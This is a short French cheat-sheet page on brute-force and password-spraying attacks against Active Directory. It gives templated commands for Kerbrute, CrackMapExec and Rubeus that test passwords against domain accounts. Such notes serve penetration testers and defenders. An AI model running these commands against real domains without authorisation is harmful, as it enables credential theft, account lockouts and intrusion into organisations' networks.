# [Exploitation/AD] Password spraying et brute force

## Introduction

Les attaques par **brute force** consistent à essayer une grande quantité de mots de passe sur un même compte alors que les attaques par **password spraying** vont essayer un ou plusieurs mots de passe sur une grande quantité de compte.

Là où l'attaque va être utilisée pour essayer d'accéder à un compte spécifique, l'attaque par password spraying va servir à obtenir un premier accès.

## Brute force

#### Kerbrute

```bash
kerbrute bruteuser --dc <DC_IP> -d <DOMAIN_FQDN> <PASSWORD_LIST> <USERNAME>
```

#### CrackMapExec

```bash
crackmapexec <PROTOCOL> <IP> <USERNAME> -p <WORDLIST>
```

<p class="callout info">Il supporte les protocoles **smb**, **http** et **mssql** .</p>

## Password spraying

#### Kerbrute

Pour essayer un mot de passe sur plusieurs comptes :

```bash
kerbrute passwordspray --dc <DC_IP> -d <DOMAIN_FQDN> <USERLIST> <PASSWORD>
```

Pour essayer des combos utilisateurs/mots de passe :

```bash
kerbrute bruteforce --dc <DC_IP> -d <DOMAIN_FQDN> <COMBO_LIST>
```

<p class="callout warning">Le fichier **&lt;COMBO\_LIST&gt;** doit respecté le format **USER:PASSWORD** .</p>

#### CrackMapExec

```bash
crackmapexec <PROTOCOL> <IP> -u <USERLIST> -p <WORDLIST>
```

#### Rubeus

```powershell
Rubeus.exe brute /password:<PASSWORD> /noticket
```